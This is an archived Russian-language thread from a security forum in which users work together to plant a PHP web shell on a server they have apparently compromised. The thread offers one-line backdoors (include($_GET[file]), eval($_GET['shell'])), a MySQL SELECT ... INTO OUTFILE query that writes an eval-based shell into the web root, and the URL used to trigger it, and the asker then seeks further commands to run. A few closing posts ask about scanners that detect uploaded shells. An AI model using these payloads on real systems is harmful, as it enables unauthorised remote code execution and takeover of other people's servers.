HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.05.2010, 00:13
BrainDeaD
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666

Репутация: 439


По умолчанию

я извиняюсь, мой пост затерялся, поетому спрошу ещё раз.

Цитата:
Сообщение от [ DSU ]  
Потому что это тхт файл который не выполняется =/
Надо с раширением php залить.
с php вобще ничего не показывает.
Цитата:
Сообщение от wildshaman  
Может, потому что там file_get_contents, а не инклуд?
возможно. как в этом случае можно глянуть какая функция используется.
 
Ответить с цитированием

  #2  
Старый 04.05.2010, 00:24
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

.:[melkiy]:.
Я с табой соглашусь!

Цитата:
Сообщение от [ DSU ]  
попробуй залить include($_GET[file]) ...
А по подробнее можно. А то я раньше таким не рользовался!
 
Ответить с цитированием

  #3  
Старый 04.05.2010, 04:47
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от GOGA075  
.:[melkiy]:.
Я с табой соглашусь!



А по подробнее можно. А то я раньше таким не рользовался!

лучше eval($_GET['shell']);


Цитата:
Сообщение от BrainDeaD  
я извиняюсь, мой пост затерялся, поетому спрошу ещё раз.


с php вобще ничего не показывает.

возможно. как в этом случае можно глянуть какая функция используется.

там не инклюд, а читалка
 
Ответить с цитированием

  #4  
Старый 04.05.2010, 04:59
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
По умолчанию

залить скрипт аплоада и через него лить уже обычный шелл

ЗЫ:Не трезв...
 
Ответить с цитированием

  #5  
Старый 04.05.2010, 07:25
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

попугай, eval($_GET['shell']); тоже ничего не дал. Ошибки только выдает! типа
Parse error: syntax error, unexpected '<' in D:\WWW\files\files.php(1) : assert code(1) : eval()'d code on line 1
 
Ответить с цитированием

  #6  
Старый 04.05.2010, 08:29
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию

Цитата:
Сообщение от GOGA075  
попугай, eval($_GET['shell']); тоже ничего не дал. Ошибки только выдает! типа
Parse error: syntax error, unexpected '<' in D:\WWW\files\files.php(1) : assert code(1) : eval()'d code on line 1

Цитата:
select '<? eval(stripslashes($_REQUEST[\'var\'])); ?>' into outfile 'D:/WWW/files/shell.php';
Потом http://site.com/files/shell.php?var=phpinfo();
__________________

You may say I'm a dreamer
But I'm not the only one

Последний раз редактировалось Twoster; 04.05.2010 в 10:08..
 
Ответить с цитированием

  #7  
Старый 04.05.2010, 17:29
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

Цитата:
Сообщение от Twoster  
Потом http://site.com/files/shell.php?var=phpinfo();
Да phpinfo то выводит без проблем!!
П ричем var не работает, только cmd!

И что ещо можно сделать через команду cmd ??

Последний раз редактировалось GOGA075; 04.05.2010 в 20:03..
 
Ответить с цитированием

  #8  
Старый 04.05.2010, 20:39
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию

подскажите пхп - скрипт сканер сервера на наличие чужих шеллов и прочих опасных файлов
 
Ответить с цитированием

  #9  
Старый 04.05.2010, 20:44
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от daniel_1024  
подскажите пхп - скрипт сканер сервера на наличие чужих шеллов и прочих опасных файлов
ммм.. а как скрипт будет различать опасные файлы по твоему?

он же работает на стороне клиента..исходники ему не видны
 
Ответить с цитированием

  #10  
Старый 04.05.2010, 21:07
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от daniel_1024  
подскажите пхп - скрипт сканер сервера на наличие чужих шеллов и прочих опасных файлов
http://slil.ru/29081007 вот, если я правильно понял. Ищит залитые шеллы на сторонних сайтах по их имени (r57.php,c99.php,c100.php и тд).

Если на своем сервере нужно найти модифицированные файлы или шеллы, то вот http://slil.ru/29081093

Последний раз редактировалось Redwood; 04.05.2010 в 21:18..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.